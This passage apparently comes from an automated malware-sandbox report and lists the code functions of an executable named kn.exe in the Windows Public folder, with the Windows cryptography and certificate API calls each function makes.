Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830D84 NCryptFreeObject,#205,#357,	6_2_00007FF7E0830D84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866EA8 NCryptImportKey,#360,	6_2_00007FF7E0866EA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0890ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,	6_2_00007FF7E0890ED0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830EF4 NCryptImportKey,#205,#359,#359,#357,	6_2_00007FF7E0830EF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C0E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07C0E24
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866E48 NCryptSetProperty,#360,	6_2_00007FF7E0866E48
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0832E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,	6_2_00007FF7E0832E6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0874E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,	6_2_00007FF7E0874E58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085EE94 CryptSignMessage,SetLastError,	6_2_00007FF7E085EE94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0802E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,	6_2_00007FF7E0802E7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D0E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,	6_2_00007FF7E07D0E94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866FAC BCryptOpenAlgorithmProvider,#360,	6_2_00007FF7E0866FAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0830FB4 NCryptOpenKey,#205,#359,#357,#357,	6_2_00007FF7E0830FB4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086700C BCryptEnumAlgorithms,#360,	6_2_00007FF7E086700C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0866F2C NCryptExportKey,#360,	6_2_00007FF7E0866F2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C8F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,	6_2_00007FF7E07C8F1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0814F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF7E0814F50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E085EF74
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0820F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,	6_2_00007FF7E0820F58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C4F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,	6_2_00007FF7E07C4F90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FB098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,	6_2_00007FF7E07FB098
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E083B0A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08670C8 BCryptSetProperty,#360,	6_2_00007FF7E08670C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08310D8 NCryptSetProperty,#205,#359,#357,#359,#357,	6_2_00007FF7E08310D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08330D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF7E08330D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0829028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,	6_2_00007FF7E0829028
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,	6_2_00007FF7E07A302F
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A7034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,	6_2_00007FF7E07A7034
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF7E083301C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0837020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E0837020
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086705C BCryptGetProperty,#360,	6_2_00007FF7E086705C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0831058 NCryptOpenStorageProvider,#205,#359,#357,	6_2_00007FF7E0831058
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,	6_2_00007FF7E07D107C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08051A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E08051A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08311C8 NCryptVerifySignature,#205,#357,#357,#357,#357,	6_2_00007FF7E08311C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08671C8 BCryptDestroyKey,#360,	6_2_00007FF7E08671C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08331C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF7E08331C0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0867214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,	6_2_00007FF7E0867214
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0889208 #357,NCryptEnumKeys,#360,#358,	6_2_00007FF7E0889208
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,	6_2_00007FF7E085511C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E9134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,	6_2_00007FF7E07E9134
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0867124 BCryptGenerateKeyPair,#360,	6_2_00007FF7E0867124
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,	6_2_00007FF7E081F168
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0815164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF7E0815164
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0813188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,	6_2_00007FF7E0813188
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0867178 BCryptCloseAlgorithmProvider,#360,	6_2_00007FF7E0867178
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08332A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF7E08332A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FB2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,	6_2_00007FF7E07FB2B4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F92C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,	6_2_00007FF7E07F92C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08132D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,	6_2_00007FF7E08132D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E082F2F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08092D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,	6_2_00007FF7E08092D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CD304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07CD304
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,	6_2_00007FF7E081D30C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CD240 #357,CryptFindOIDInfo,#357,LocalFree,	6_2_00007FF7E07CD240
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,	6_2_00007FF7E085D28C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0867290 NCryptIsKeyHandle,#359,#360,#357,#358,	6_2_00007FF7E0867290
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08433B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,	6_2_00007FF7E08433B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,	6_2_00007FF7E086739C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08133A0 CryptVerifyCertificateSignature,CertCompareCertificateName,	6_2_00007FF7E08133A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08693A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF7E08693A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08153E8 CryptEncodeObjectEx,GetLastError,#357,	6_2_00007FF7E08153E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	6_2_00007FF7E081B3D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F13F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	6_2_00007FF7E07F13F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CB324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,	6_2_00007FF7E07CB324
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C7340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,	6_2_00007FF7E07C7340
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F5338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF7E07F5338
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07EB350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,	6_2_00007FF7E07EB350
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BB36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,	6_2_00007FF7E07BB36C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0833390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,	6_2_00007FF7E0833390
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085F4A0 CryptHashPublicKeyInfo,SetLastError,	6_2_00007FF7E085F4A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E084B4EC CryptDecodeObjectEx,SetLastError,	6_2_00007FF7E084B4EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08614F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,	6_2_00007FF7E08614F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F3504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,	6_2_00007FF7E07F3504
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08334F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,	6_2_00007FF7E08334F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF7E083342C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF7E086141C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0795438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,	6_2_00007FF7E0795438
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E084B464 CryptEncodeObjectEx,SetLastError,	6_2_00007FF7E084B464
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,	6_2_00007FF7E081F488
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0839480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E0839480
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BD5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07BD5C2
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,	6_2_00007FF7E07F55F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08195FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,	6_2_00007FF7E08195FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,	6_2_00007FF7E07FB55C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085F570 CryptHashCertificate,SetLastError,	6_2_00007FF7E085F570
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0833590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF7E0833590
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0869580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,	6_2_00007FF7E0869580
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E76B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF7E07E76B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E084D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,	6_2_00007FF7E084D6A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08336E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF7E08336E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,	6_2_00007FF7E081F6D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BF630 CryptAcquireContextW,GetLastError,#357,SetLastError,	6_2_00007FF7E07BF630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085F650 CryptHashCertificate2,SetLastError,	6_2_00007FF7E085F650
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0833654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,	6_2_00007FF7E0833654
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E082F644
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BD660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,	6_2_00007FF7E07BD660
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A5664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,	6_2_00007FF7E07A5664
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,	6_2_00007FF7E080366C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,	6_2_00007FF7E081B664
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0859688 CryptFindOIDInfo,#357,#360,#360,#360,	6_2_00007FF7E0859688
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08337A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF7E08337A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D17D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,	6_2_00007FF7E07D17D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08497E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,	6_2_00007FF7E08497E4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,	6_2_00007FF7E081B808
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,	6_2_00007FF7E085F7FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CF810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,	6_2_00007FF7E07CF810
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,	6_2_00007FF7E085D750
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0835768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF7E0835768
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FF774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,	6_2_00007FF7E07FF774
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E084B794 CryptExportPublicKeyInfoEx,SetLastError,	6_2_00007FF7E084B794
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080577C #360,#358,CryptDecodeObject,GetLastError,#357,	6_2_00007FF7E080577C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CD790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,	6_2_00007FF7E07CD790
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07AB788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,	6_2_00007FF7E07AB788
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08698B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF7E08698B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081B8D0 I_CryptGetLruEntryData,#357,	6_2_00007FF7E081B8D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08018DC CertFindExtension,CryptDecodeObject,GetLastError,#357,	6_2_00007FF7E08018DC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A38FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,	6_2_00007FF7E07A38FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,	6_2_00007FF7E082184C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,	6_2_00007FF7E081D850
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0833860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF7E0833860
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C7884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,	6_2_00007FF7E07C7884
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0809878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,	6_2_00007FF7E0809878
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,	6_2_00007FF7E081B9CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07BF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,	6_2_00007FF7E07BF9B8
